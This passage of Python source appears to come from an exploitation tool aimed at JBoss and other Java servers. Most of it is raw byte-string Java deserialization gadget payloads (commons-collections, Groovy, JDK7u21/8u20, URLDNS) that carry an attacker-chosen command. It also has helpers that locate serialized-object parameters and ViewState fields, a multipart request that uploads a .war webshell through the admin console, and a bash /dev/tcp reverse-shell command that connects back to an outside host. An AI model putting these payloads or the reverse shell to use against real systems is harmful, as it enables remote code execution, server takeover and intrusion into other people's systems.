\x02\x4C\x00\x05\x64\x75\x6D\x6D\x79\x74\x00\x12\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x4F\
\x62\x6A\x65\x63\x74\x3B\x4C\x00\x01\x68\x74\x00\x25\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\
\x72\x65\x66\x6C\x65\x63\x74\x2F\x49\x6E\x76\x6F\x63\x61\x74\x69\x6F\x6E\x48\x61\x6E\x64\x6C\x65\
\x72\x3B\x78\x70\x73\x72\x00\x29\x6A\x61\x76\x61\x2E\x62\x65\x61\x6E\x73\x2E\x62\x65\x61\x6E\x63\
\x6F\x6E\x74\x65\x78\x74\x2E\x42\x65\x61\x6E\x43\x6F\x6E\x74\x65\x78\x74\x53\x75\x70\x70\x6F\x72\
\x74\xBC\x48\x20\xF0\x91\x8F\xB9\x0C\x03\x00\x01\x49\x00\x0C\x73\x65\x72\x69\x61\x6C\x69\x7A\x61\
\x62\x6C\x65\x78\x72\x00\x2E\x6A\x61\x76\x61\x2E\x62\x65\x61\x6E\x73\x2E\x62\x65\x61\x6E\x63\x6F\
\x6E\x74\x65\x78\x74\x2E\x42\x65\x61\x6E\x43\x6F\x6E\x74\x65\x78\x74\x43\x68\x69\x6C\x64\x53\x75\
\x70\x70\x6F\x72\x74\x57\xD4\xEF\xC7\x04\xDC\x72\x25\x02\x00\x01\x4C\x00\x14\x62\x65\x61\x6E\x43\
\x6F\x6E\x74\x65\x78\x74\x43\x68\x69\x6C\x64\x50\x65\x65\x72\x74\x00\x29\x4C\x6A\x61\x76\x61\x2F\
\x62\x65\x61\x6E\x73\x2F\x62\x65\x61\x6E\x63\x6F\x6E\x74\x65\x78\x74\x2F\x42\x65\x61\x6E\x43\x6F\
\x6E\x74\x65\x78\x74\x43\x68\x69\x6C\x64\x3B\x78\x70\x71\x00\x7E\x00\x19\x00\x00\x00\x01\x73\x72\
\x00\x32\x73\x75\x6E\x2E\x72\x65\x66\x6C\x65\x63\x74\x2E\x61\x6E\x6E\x6F\x74\x61\x74\x69\x6F\x6E\
\x2E\x41\x6E\x6E\x6F\x74\x61\x74\x69\x6F\x6E\x49\x6E\x76\x6F\x63\x61\x74\x69\x6F\x6E\x48\x61\x6E\
\x64\x6C\x65\x72\x55\xCA\xF5\x0F\x15\xCB\x7E\xA5\x03\x00\x02\x4C\x00\x04\x74\x79\x70\x65\x74\x00\
\x11\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x43\x6C\x61\x73\x73\x3B\x4C\x00\x0C\x6D\x65\x6D\
\x62\x65\x72\x56\x61\x6C\x75\x65\x73\x74\x00\x0F\x4C\x6A\x61\x76\x61\x2F\x75\x74\x69\x6C\x2F\x4D\
\x61\x70\x3B\x78\x70\x76\x72\x00\x1D\x6A\x61\x76\x61\x78\x2E\x78\x6D\x6C\x2E\x74\x72\x61\x6E\x73\
\x66\x6F\x72\x6D\x2E\x54\x65\x6D\x70\x6C\x61\x74\x65\x73\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x78\x70\x73\x72\x00\x11\x6A\x61\x76\x61\x2E\x75\x74\x69\x6C\x2E\x48\x61\x73\x68\x4D\x61\x70\
\x05\x07\xDA\xC1\xC3\x16\x60\xD1\x03\x00\x02\x46\x00\x0A\x6C\x6F\x61\x64\x46\x61\x63\x74\x6F\x72\
\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6F\x6C\x64\x78\x70\x3F\x40\x00\x00\x00\x00\x00\x0C\x77\x08\
\x00\x00\x00\x10\x00\x00\x00\x01\x74\x00\x08\x66\x35\x61\x35\x61\x36\x30\x38\x71\x00\x7E\x00\x09\
\x78\x77\x04\x00\x00\x00\x00\x78\x71\x00\x7E\x00\x1D\x78")
return payload
def generate_groovy1_payload(cmd):
# org.codehaus.groovy:groovy:2.3.9
payload_groovy1 = (
b"\xAC\xED\x00\x05\x73\x72\x00\x32\x73\x75\x6E\x2E\x72\x65\x66\x6C\x65\x63\x74\x2E\x61\x6E\x6E\
\x6F\x74\x61\x74\x69\x6F\x6E\x2E\x41\x6E\x6E\x6F\x74\x61\x74\x69\x6F\x6E\x49\x6E\x76\x6F\x63\x61\
\x74\x69\x6F\x6E\x48\x61\x6E\x64\x6C\x65\x72\x55\xCA\xF5\x0F\x15\xCB\x7E\xA5\x02\x00\x02\x4C\x00\
\x0C\x6D\x65\x6D\x62\x65\x72\x56\x61\x6C\x75\x65\x73\x74\x00\x0F\x4C\x6A\x61\x76\x61\x2F\x75\x74\
\x69\x6C\x2F\x4D\x61\x70\x3B\x4C\x00\x04\x74\x79\x70\x65\x74\x00\x11\x4C\x6A\x61\x76\x61\x2F\x6C\
\x61\x6E\x67\x2F\x43\x6C\x61\x73\x73\x3B\x78\x70\x73\x7D\x00\x00\x00\x01\x00\x0D\x6A\x61\x76\x61\
\x2E\x75\x74\x69\x6C\x2E\x4D\x61\x70\x78\x72\x00\x17\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x72\
\x65\x66\x6C\x65\x63\x74\x2E\x50\x72\x6F\x78\x79\xE1\x27\xDA\x20\xCC\x10\x43\xCB\x02\x00\x01\x4C\
\x00\x01\x68\x74\x00\x25\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x72\x65\x66\x6C\x65\x63\x74\
\x2F\x49\x6E\x76\x6F\x63\x61\x74\x69\x6F\x6E\x48\x61\x6E\x64\x6C\x65\x72\x3B\x78\x70\x73\x72\x00\
\x2C\x6F\x72\x67\x2E\x63\x6F\x64\x65\x68\x61\x75\x73\x2E\x67\x72\x6F\x6F\x76\x79\x2E\x72\x75\x6E\
\x74\x69\x6D\x65\x2E\x43\x6F\x6E\x76\x65\x72\x74\x65\x64\x43\x6C\x6F\x73\x75\x72\x65\x10\x23\x37\
\x19\xF7\x15\xDD\x1B\x02\x00\x01\x4C\x00\x0A\x6D\x65\x74\x68\x6F\x64\x4E\x61\x6D\x65\x74\x00\x12\
\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x53\x74\x72\x69\x6E\x67\x3B\x78\x72\x00\x2D\x6F\x72\
\x67\x2E\x63\x6F\x64\x65\x68\x61\x75\x73\x2E\x67\x72\x6F\x6F\x76\x79\x2E\x72\x75\x6E\x74\x69\x6D\
\x65\x2E\x43\x6F\x6E\x76\x65\x72\x73\x69\x6F\x6E\x48\x61\x6E\x64\x6C\x65\x72\x10\x23\x37\x1A\xD6\
\x01\xBC\x1B\x02\x00\x02\x4C\x00\x08\x64\x65\x6C\x65\x67\x61\x74\x65\x74\x00\x12\x4C\x6A\x61\x76\
\x61\x2F\x6C\x61\x6E\x67\x2F\x4F\x62\x6A\x65\x63\x74\x3B\x4C\x00\x0B\x68\x61\x6E\x64\x6C\x65\x43\
\x61\x63\x68\x65\x74\x00\x28\x4C\x6A\x61\x76\x61\x2F\x75\x74\x69\x6C\x2F\x63\x6F\x6E\x63\x75\x72\
\x72\x65\x6E\x74\x2F\x43\x6F\x6E\x63\x75\x72\x72\x65\x6E\x74\x48\x61\x73\x68\x4D\x61\x70\x3B\x78\
\x70\x73\x72\x00\x29\x6F\x72\x67\x2E\x63\x6F\x64\x65\x68\x61\x75\x73\x2E\x67\x72\x6F\x6F\x76\x79\
\x2E\x72\x75\x6E\x74\x69\x6D\x65\x2E\x4D\x65\x74\x68\x6F\x64\x43\x6C\x6F\x73\x75\x72\x65\x11\x0E\
\x3E\x84\x8F\xBD\xCE\x48\x02\x00\x01\x4C\x00\x06\x6D\x65\x74\x68\x6F\x64\x71\x00\x7E\x00\x09\x78\
\x72\x00\x13\x67\x72\x6F\x6F\x76\x79\x2E\x6C\x61\x6E\x67\x2E\x43\x6C\x6F\x73\x75\x72\x65\x3C\xA0\
\xC7\x66\x16\x12\x6C\x5A\x02\x00\x08\x49\x00\x09\x64\x69\x72\x65\x63\x74\x69\x76\x65\x49\x00\x19\
\x6D\x61\x78\x69\x6D\x75\x6D\x4E\x75\x6D\x62\x65\x72\x4F\x66\x50\x61\x72\x61\x6D\x65\x74\x65\x72\
\x73\x49\x00\x0F\x72\x65\x73\x6F\x6C\x76\x65\x53\x74\x72\x61\x74\x65\x67\x79\x4C\x00\x03\x62\x63\
\x77\x74\x00\x3C\x4C\x6F\x72\x67\x2F\x63\x6F\x64\x65\x68\x61\x75\x73\x2F\x67\x72\x6F\x6F\x76\x79\
\x2F\x72\x75\x6E\x74\x69\x6D\x65\x2F\x63\x61\x6C\x6C\x73\x69\x74\x65\x2F\x42\x6F\x6F\x6C\x65\x61\
\x6E\x43\x6C\x6F\x73\x75\x72\x65\x57\x72\x61\x70\x70\x65\x72\x3B\x4C\x00\x08\x64\x65\x6C\x65\x67\
\x61\x74\x65\x71\x00\x7E\x00\x0B\x4C\x00\x05\x6F\x77\x6E\x65\x72\x71\x00\x7E\x00\x0B\x5B\x00\x0E\
\x70\x61\x72\x61\x6D\x65\x74\x65\x72\x54\x79\x70\x65\x73\x74\x00\x12\x5B\x4C\x6A\x61\x76\x61\x2F\
\x6C\x61\x6E\x67\x2F\x43\x6C\x61\x73\x73\x3B\x4C\x00\x0A\x74\x68\x69\x73\x4F\x62\x6A\x65\x63\x74\
\x71\x00\x7E\x00\x0B\x78\x70\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x70\x74\x00")
if version_info[0] >= 3:
payload_groovy1 += (bytes(chr(len(cmd)), 'utf-8'))
payload_groovy1 += (bytes(cmd, 'utf-8'))
else:
payload_groovy1 += (chr(len(cmd)))
payload_groovy1 += (cmd)
payload_groovy1 += (b"\x71\x00\x7E\x00\x13\x75\x72\
\x00\x12\x5B\x4C\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x43\x6C\x61\x73\x73\x3B\xAB\x16\xD7\xAE\
\xCB\xCD\x5A\x99\x02\x00\x00\x78\x70\x00\x00\x00\x02\x76\x72\x00\x13\x5B\x4C\x6A\x61\x76\x61\x2E\
\x6C\x61\x6E\x67\x2E\x53\x74\x72\x69\x6E\x67\x3B\xAD\xD2\x56\xE7\xE9\x1D\x7B\x47\x02\x00\x00\x78\
\x70\x76\x72\x00\x0C\x6A\x61\x76\x61\x2E\x69\x6F\x2E\x46\x69\x6C\x65\x04\x2D\xA4\x45\x0E\x0D\xE4\
\xFF\x03\x00\x01\x4C\x00\x04\x70\x61\x74\x68\x71\x00\x7E\x00\x09\x78\x70\x70\x74\x00\x07\x65\x78\
\x65\x63\x75\x74\x65\x73\x72\x00\x26\x6A\x61\x76\x61\x2E\x75\x74\x69\x6C\x2E\x63\x6F\x6E\x63\x75\
\x72\x72\x65\x6E\x74\x2E\x43\x6F\x6E\x63\x75\x72\x72\x65\x6E\x74\x48\x61\x73\x68\x4D\x61\x70\x64\
\x99\xDE\x12\x9D\x87\x29\x3D\x03\x00\x03\x49\x00\x0B\x73\x65\x67\x6D\x65\x6E\x74\x4D\x61\x73\x6B\
\x49\x00\x0C\x73\x65\x67\x6D\x65\x6E\x74\x53\x68\x69\x66\x74\x5B\x00\x08\x73\x65\x67\x6D\x65\x6E\
\x74\x73\x74\x00\x31\x5B\x4C\x6A\x61\x76\x61\x2F\x75\x74\x69\x6C\x2F\x63\x6F\x6E\x63\x75\x72\x72\
\x65\x6E\x74\x2F\x43\x6F\x6E\x63\x75\x72\x72\x65\x6E\x74\x48\x61\x73\x68\x4D\x61\x70\x24\x53\x65\
\x67\x6D\x65\x6E\x74\x3B\x78\x70\x00\x00\x00\x0F\x00\x00\x00\x1C\x75\x72\x00\x31\x5B\x4C\x6A\x61\
\x76\x61\x2E\x75\x74\x69\x6C\x2E\x63\x6F\x6E\x63\x75\x72\x72\x65\x6E\x74\x2E\x43\x6F\x6E\x63\x75\
\x72\x72\x65\x6E\x74\x48\x61\x73\x68\x4D\x61\x70\x24\x53\x65\x67\x6D\x65\x6E\x74\x3B\x52\x77\x3F\
\x41\x32\x9B\x39\x74\x02\x00\x00\x78\x70\x00\x00\x00\x10\x73\x72\x00\x2E\x6A\x61\x76\x61\x2E\x75\
\x74\x69\x6C\x2E\x63\x6F\x6E\x63\x75\x72\x72\x65\x6E\x74\x2E\x43\x6F\x6E\x63\x75\x72\x72\x65\x6E\
\x74\x48\x61\x73\x68\x4D\x61\x70\x24\x53\x65\x67\x6D\x65\x6E\x74\x1F\x36\x4C\x90\x58\x93\x29\x3D\
\x02\x00\x01\x46\x00\x0A\x6C\x6F\x61\x64\x46\x61\x63\x74\x6F\x72\x78\x72\x00\x28\x6A\x61\x76\x61\
\x2E\x75\x74\x69\x6C\x2E\x63\x6F\x6E\x63\x75\x72\x72\x65\x6E\x74\x2E\x6C\x6F\x63\x6B\x73\x2E\x52\
\x65\x65\x6E\x74\x72\x61\x6E\x74\x4C\x6F\x63\x6B\x66\x55\xA8\x2C\x2C\xC8\x6A\xEB\x02\x00\x01\x4C\
\x00\x04\x73\x79\x6E\x63\x74\x00\x2F\x4C\x6A\x61\x76\x61\x2F\x75\x74\x69\x6C\x2F\x63\x6F\x6E\x63\
\x75\x72\x72\x65\x6E\x74\x2F\x6C\x6F\x63\x6B\x73\x2F\x52\x65\x65\x6E\x74\x72\x61\x6E\x74\x4C\x6F\
\x63\x6B\x24\x53\x79\x6E\x63\x3B\x78\x70\x73\x72\x00\x34\x6A\x61\x76\x61\x2E\x75\x74\x69\x6C\x2E\
\x63\x6F\x6E\x63\x75\x72\x72\x65\x6E\x74\x2E\x6C\x6F\x63\x6B\x73\x2E\x52\x65\x65\x6E\x74\x72\x61\
\x6E\x74\x4C\x6F\x63\x6B\x24\x4E\x6F\x6E\x66\x61\x69\x72\x53\x79\x6E\x63\x65\x88\x32\xE7\x53\x7B\
\xBF\x0B\x02\x00\x00\x78\x72\x00\x2D\x6A\x61\x76\x61\x2E\x75\x74\x69\x6C\x2E\x63\x6F\x6E\x63\x75\
\x72\x72\x65\x6E\x74\x2E\x6C\x6F\x63\x6B\x73\x2E\x52\x65\x65\x6E\x74\x72\x61\x6E\x74\x4C\x6F\x63\
\x6B\x24\x53\x79\x6E\x63\xB8\x1E\xA2\x94\xAA\x44\x5A\x7C\x02\x00\x00\x78\x72\x00\x35\x6A\x61\x76\
\x61\x2E\x75\x74\x69\x6C\x2E\x63\x6F\x6E\x63\x75\x72\x72\x65\x6E\x74\x2E\x6C\x6F\x63\x6B\x73\x2E\
\x41\x62\x73\x74\x72\x61\x63\x74\x51\x75\x65\x75\x65\x64\x53\x79\x6E\x63\x68\x72\x6F\x6E\x69\x7A\
\x65\x72\x66\x55\xA8\x43\x75\x3F\x52\xE3\x02\x00\x01\x49\x00\x05\x73\x74\x61\x74\x65\x78\x72\x00\
\x36\x6A\x61\x76\x61\x2E\x75\x74\x69\x6C\x2E\x63\x6F\x6E\x63\x75\x72\x72\x65\x6E\x74\x2E\x6C\x6F\
\x63\x6B\x73\x2E\x41\x62\x73\x74\x72\x61\x63\x74\x4F\x77\x6E\x61\x62\x6C\x65\x53\x79\x6E\x63\x68\
\x72\x6F\x6E\x69\x7A\x65\x72\x33\xDF\xAF\xB9\xAD\x6D\x6F\xA9\x02\x00\x00\x78\x70\x00\x00\x00\x00\
\x3F\x40\x00\x00\x73\x71\x00\x7E\x00\x20\x73\x71\x00\x7E\x00\x24\x00\x00\x00\x00\x3F\x40\x00\x00\
\x73\x71\x00\x7E\x00\x20\x73\x71\x00\x7E\x00\x24\x00\x00\x00\x00\x3F\x40\x00\x00\x73\x71\x00\x7E\
\x00\x20\x73\x71\x00\x7E\x00\x24\x00\x00\x00\x00\x3F\x40\x00\x00\x73\x71\x00\x7E\x00\x20\x73\x71\
\x00\x7E\x00\x24\x00\x00\x00\x00\x3F\x40\x00\x00\x73\x71\x00\x7E\x00\x20\x73\x71\x00\x7E\x00\x24\
\x00\x00\x00\x00\x3F\x40\x00\x00\x73\x71\x00\x7E\x00\x20\x73\x71\x00\x7E\x00\x24\x00\x00\x00\x00\
\x3F\x40\x00\x00\x73\x71\x00\x7E\x00\x20\x73\x71\x00\x7E\x00\x24\x00\x00\x00\x00\x3F\x40\x00\x00\
\x73\x71\x00\x7E\x00\x20\x73\x71\x00\x7E\x00\x24\x00\x00\x00\x00\x3F\x40\x00\x00\x73\x71\x00\x7E\
\x00\x20\x73\x71\x00\x7E\x00\x24\x00\x00\x00\x00\x3F\x40\x00\x00\x73\x71\x00\x7E\x00\x20\x73\x71\
\x00\x7E\x00\x24\x00\x00\x00\x00\x3F\x40\x00\x00\x73\x71\x00\x7E\x00\x20\x73\x71\x00\x7E\x00\x24\
\x00\x00\x00\x00\x3F\x40\x00\x00\x73\x71\x00\x7E\x00\x20\x73\x71\x00\x7E\x00\x24\x00\x00\x00\x00\
\x3F\x40\x00\x00\x73\x71\x00\x7E\x00\x20\x73\x71\x00\x7E\x00\x24\x00\x00\x00\x00\x3F\x40\x00\x00\
\x73\x71\x00\x7E\x00\x20\x73\x71\x00\x7E\x00\x24\x00\x00\x00\x00\x3F\x40\x00\x00\x73\x71\x00\x7E\
\x00\x20\x73\x71\x00\x7E\x00\x24\x00\x00\x00\x00\x3F\x40\x00\x00\x70\x70\x78\x74\x00\x08\x65\x6E\
\x74\x72\x79\x53\x65\x74\x76\x72\x00\x12\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x4F\x76\x65\x72\
\x72\x69\x64\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70")
return payload_groovy1
def generate_urldns_payload(url):
# based on Gabriel Lawrence gadget
payload = (b"\xAC\xED\x00\x05\x73\x72\x00\x11\x6A\x61\x76\x61\x2E\x75\x74\x69\x6C\x2E\x48\x61\x73\x68\x4D\
\x61\x70\x05\x07\xDA\xC1\xC3\x16\x60\xD1\x03\x00\x02\x46\x00\x0A\x6C\x6F\x61\x64\x46\x61\x63\x74\
\x6F\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6F\x6C\x64\x78\x70\x3F\x40\x00\x00\x00\x00\x00\x0C\
\x77\x08\x00\x00\x00\x10\x00\x00\x00\x01\x73\x72\x00\x0C\x6A\x61\x76\x61\x2E\x6E\x65\x74\x2E\x55\
\x52\x4C\x96\x25\x37\x36\x1A\xFC\xE4\x72\x03\x00\x07\x49\x00\x08\x68\x61\x73\x68\x43\x6F\x64\x65\
\x49\x00\x04\x70\x6F\x72\x74\x4C\x00\x09\x61\x75\x74\x68\x6F\x72\x69\x74\x79\x74\x00\x12\x4C\x6A\
\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x53\x74\x72\x69\x6E\x67\x3B\x4C\x00\x04\x66\x69\x6C\x65\x71\
\x00\x7E\x00\x03\x4C\x00\x04\x68\x6F\x73\x74\x71\x00\x7E\x00\x03\x4C\x00\x08\x70\x72\x6F\x74\x6F\
\x63\x6F\x6C\x71\x00\x7E\x00\x03\x4C\x00\x03\x72\x65\x66\x71\x00\x7E\x00\x03\x78\x70\xFF\xFF\xFF\
\xFF\xFF\xFF\xFF\xFF\x74\x00")
if version_info[0] >= 3:
payload += (bytes(chr(len(url)), 'utf-8'))
payload += (bytes(url, 'utf-8'))
else:
payload += (chr(len(url)))
payload += (url)
payload += (b"\x74\x00\x00\x71\x00\x7E\x00\x05\x74\x00\x05\x68\x74\x74\x70\x73\x70\x78\x74\x00\x19\x68\x74\
\x74\x70\x73\x3A\x2F\x2F\x74\x65\x73\x74\x2E\x6A\x65\x78\x62\x6F\x73\x73\x2E\x69\x6E\x66\x6F\x78")
return payload
def get_payload_gadget(gadget_type, cmd):
return {
'commons-collections3.1': generate_commons_collections31_payload(cmd),
'commons-collections4.0': generate_commons_collections40_payload(cmd),
'groovy1': generate_groovy1_payload(cmd),
'jdk7u21': generate_jdk7u21_payload(cmd),
'jdk8u20': generate_jdk8u20_payload(cmd),
'dns': generate_urldns_payload(cmd),
}.get(gadget_type, generate_commons_collections31_payload(cmd))
def get_link_for_post(page):
"""
Search for link to post data in the page
:param page: The code of the page for search in it
:return: The link for post method or None
"""
page = str(page).replace("\\n", "\n")
# stage 1 - search for form-urlencoded
for line in page.strip().split('\n'):
# this is the post line
if 'application/x-www-form-urlencoded' in line:
tokens = line.strip().split(" ")
for t in tokens:
if 'action' in t and len(t) > 10:
return t.split(">")[0][8:-1]
# stage 2 - search for any post method
for line in page.strip().split('\n'):
# this is the post line
if 'method=\"post\"' in line.lower():
tokens = line.strip().split(" ")
for t in tokens:
if 'action' in t and len(t) > 10:
return t.split(">")[0][8:-1]
return None
def get_serialized_obj_from_param(page, param):
"""
Get content of a param that contains a java serialized object (base64 gziped or only base64 of raw)
:param page: The page source code for search in it
:param param: The param that will be searched
:return: Param content with java serialized object or None
"""
page = str(page).replace("\\n", "\n")
full_param = "name=\""+param+"\""
for i in page.strip().split('\n'):
tokens = i.strip().split(" ")
for t in tokens:
# get param value
if full_param in t:
index = tokens.index(full_param)
if 'value=\"' in tokens[index+1]:
obj = tokens[index+1].split("\"")[1]
if obj.startswith("H4sI") or obj.startswith("rO0"):
#return last_link, obj
return obj
elif tokens[index+2]:
obj = tokens[index+2].split("\"")[1]
if obj.startswith("H4sI") or obj.startswith("rO0"):
#return last_link, obj
return obj
return None
def get_list_params_with_serialized_objs(page):
"""
Search for parameters that contain a java serialized object
:param page: The page source code for search in it
:return: List of parameters found
"""
page = str(page).replace("\\n", "\n")
list_params = []
for i in page.split('\n'):
tokens = i.strip().split(" ")
for ind in range(0, len(tokens)):
t = tokens[ind]
if 'value=\"H4sI' in t or 'value=\"rO0' in t:
if 'name=\"' in tokens[ind-1] or 'id=\"' in tokens[ind-1]:
param = tokens[ind-1].split("\"")[1]
if param not in list_params:
list_params.append(param)
return list_params
def get_viewstate_value(page):
"""
Find for content of the viewState param in source code
:param page: The code of the page for search in it
:return: The content of the viewstate param or None
"""
page = str(page).replace("\\n", "\n")
full_param = "name=\"javax.faces.ViewState\""
for i in page.strip().split('\n'):
tokens = i.strip().split(" ")
for t in tokens:
# get param value
if full_param in t:
index = tokens.index(full_param)
if 'value=\"' in tokens[index+1]:
obj = tokens[index+1].split("\"")[1]
return obj
elif tokens[index+2]:
obj = tokens[index+2].split("\"")[1]
return obj
return None
def get_url_base(url):
"""
Get the Authority from an URI, according with rfc3986
:param url: The uri provided by the user in -u param
:return: the authority from the uri
"""
if '://' in url:
protocol = url.split('://')[0] + '://'
else:
protocol = ''
url_base = protocol+url.split('://')[-1].split('/')[0]
return url_base
def get_boundary_admin_console(jboss_version, state, payload):
"""
Get boundaty for post in admin-console
:param jboss_version: jboss version. Supported: 5 and 6
:param state: content of the viewState
:param payload: the .war to deploy in jboss
:return: boundary ready to send in post
"""
boundary = "-----------------------------551367293438156646377323759\r\n"
if jboss_version == 6:
data = boundary
data += "Content-Disposition: form-data; name=\"createContentForm\"\r\n"
data += "\r\n"
data += "createContentForm\r\n"
data += boundary
data += "Content-Disposition: form-data; name=\"createContentForm:file\"; filename=\"jexws4.war\"\r\n"
data += "Content-Type: application/octet-stream\r\n"
data += "\r\n"
data += payload + "\r\n"
data += boundary
data += "Content-Disposition: form-data; name=\"createContentForm:rhq_prop-0_328868266\"\r\n"
data += "\r\n"
data += "false\r\n"
data += boundary
data += "Content-Disposition: form-data; name=\"createContentForm:rhq_prop-0_-1257012452\"\r\n"
data += "\r\n"
data += "false\r\n"
data += boundary
data += "Content-Disposition: form-data; name=\"createContentForm:addButton\"\r\n"
data += "\r\n"
data += "Continue\r\n"
data += boundary
data += "Content-Disposition: form-data; name=\"javax.faces.ViewState\"\r\n"
data += "\r\n"
data += state + "\r\n"
data += "-----------------------------551367293438156646377323759--\r\n"
return data
elif jboss_version == 5:
data = boundary
data += "Content-Disposition: form-data; name=\"createContentForm\"\r\n"
data += "\r\n"
data += "createContentForm\r\n"
data += boundary
data += "Content-Disposition: form-data; name=\"createContentForm:file\"; filename=\"jexws4.war\"\r\n"
data += "Content-Type: application/octet-stream\r\n"
data += "\r\n"
data += payload + "\r\n"
data += boundary
data += "Content-Disposition: form-data; name=\"createContentForm:rhq_prop-1995377939_328868266\"\r\n"
data += "\r\n"
data += "false\r\n"
data += boundary
data += "Content-Disposition: form-data; name=\"createContentForm:addButton\"\r\n"
data += "\r\n"
data += "Continue\r\n"
data += boundary
data += "Content-Disposition: form-data; name=\"javax.faces.ViewState\"\r\n"
data += "\r\n"
data += state + "\r\n"
data += "-----------------------------551367293438156646377323759--\r\n"
return data
def url_encode(text):
"""
Encode text to URL Encode
:param text: text to be encoded
:return: encoded text
"""
if version_info[0] >= 3:
return quote(text)
else:
return urllib.quote_plus(text)
def generate_cmd_for_runtime_exec(cmd, host, port, is_win):
# if is only one command (or dns query)
if cmd is not None and len(cmd.strip().split(" ")) == 1:
return cmd
# if reverse shell were chosen
elif host is not None and port is not None:
if not is_win:
cmd = "/bin/bash -c /bin/bash${IFS}-i>&/dev/tcp/%s/%s<&1" % (host, port)
else:
if is_win:
cmd = "cmd.exe /C %s" % cmd.replace(' ', ' ')
else:
cmd = "/bin/bash -c %s" % cmd.replace(' ', ' ').replace(' ', '${IFS}')
return cmd
def get_html_redirect_link(page):
"""
Check if the page souce contains a redirect in html and extrat it
:param page: the page source code
:return: link to redirect or None
"""
if 'http-equiv=\"refresh\"' in page.lower():
page = str(page).replace("\\n", "\n")
# each line
for line in page.split('\n'):
if 'http-equiv=\"refresh\"' in line.lower():
tokens = line.strip().split("\"")
# each token
for t in tokens:
if "url=" in t.lower():
return t.lower().split('url=')[-1]
else:
return None
def shows_payload(payload, gadget_type):
jexboss.print_and_flush(GREEN + "\n------------------------------------------------------------" + ENDC)
jexboss.print_and_flush(GREEN + " [*] Payload (%s):\n" %gadget_type+ ENDC)
jexboss.print_and_flush(url_encode(payload))
jexboss.print_and_flush(GREEN + "------------------------------------------------------------\n" + ENDC)